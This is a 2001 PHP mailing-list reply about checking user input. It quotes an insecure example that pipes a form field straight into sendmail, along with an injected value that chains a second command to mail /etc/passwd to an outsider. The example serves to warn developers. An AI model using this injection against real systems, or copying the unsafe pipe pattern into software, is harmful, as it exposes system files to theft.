At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > I've done something similar in the past just for kicks, and I got the same
> > result you did (i.e. an error). I believe this is because mysql_query()
> > expects ONE query at a time and will break if you send two or more. I
> > could be completely and totally wrong about that, though (someone please
> > correct me if I am)...
>
>Maybe this one failed, but it's always a good idea to check user input.
>Let's say you're emailing a form and you don't use the mail() function,
>but make a call directly to sendmail... and you're sloppy... so you do
>this:
[...]
True. But we were speaking specifically about MySQL. When you start
toying with external programs and exec() and so forth then you've opened up
a whole other can of worms security-wise...
>$fp = fopen("|/usr/bin/sendmail $sendto");
>#write stuff to pipe to send email...
>
>Now... what if when I filled out the form I set $sendto equal to this:
>
>[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
A definite possibility, but it does depend on the hacker in question
knowing exactly how your script is written...
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
